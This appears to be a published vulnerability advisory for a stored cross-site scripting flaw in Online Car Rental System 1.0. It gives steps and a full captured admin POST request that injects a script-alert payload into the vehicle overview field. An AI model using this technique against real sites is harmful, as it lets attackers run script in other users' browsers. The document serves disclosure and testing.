Online Car Rental System version 1.0 suffers from a persistent cross site scripting vulnerability.
7e52c3bb3dae8bf19a82735dfb6fdd8c
# Exploit Title: Online Car Rental System 1.0 - Stored Cross Site Scripting
# Date: 9/2/2021
# Exploit Author: Naved Shaikh
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html
# Version: V 1.0
# Tested on Windows 10, XAMPP
Steps:
1) Open http://localhost/car-rental/admin/post-avehical.php
2) Fill All the details on the page. After submitting, capture the request and change the "vehicalorcview" parameter with our Payload "<script>alert("CAR")</script>" and submit
3) Open the http://localhost/car-rental/ and our Payload excuted.
Request
POST /car-rental/admin/post-avehical.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13786099262839578593645594965
Content-Length: 2724377
Origin: http://localhost
Connection: close
Referer: http://localhost/car-rental/admin/post-avehical.php
Cookie: PHPSESSID=h5ubatunno8u9130c4eq77anf2
Upgrade-Insecure-Requests: 1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="vehicletitle"
TestName
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="brandname"
2
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="vehicalorcview"
<script>alert("CAR")</script>
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="priceperday"
200
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="fueltype"
Diesel
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="modelyear"
2008
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="seatingcapacity"
22
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="img1"; filename="Untitled.png"
Content-Type: image/png
PNG
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="img5"; filename=""
Content-Type: application/octet-stream
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="powerdoorlocks"
1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="antilockbrakingsys"
1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="driverairbag"
1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="passengerairbag"
1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="centrallocking"
1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="crashcensor"
1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="submit"
-----------------------------13786099262839578593645594965--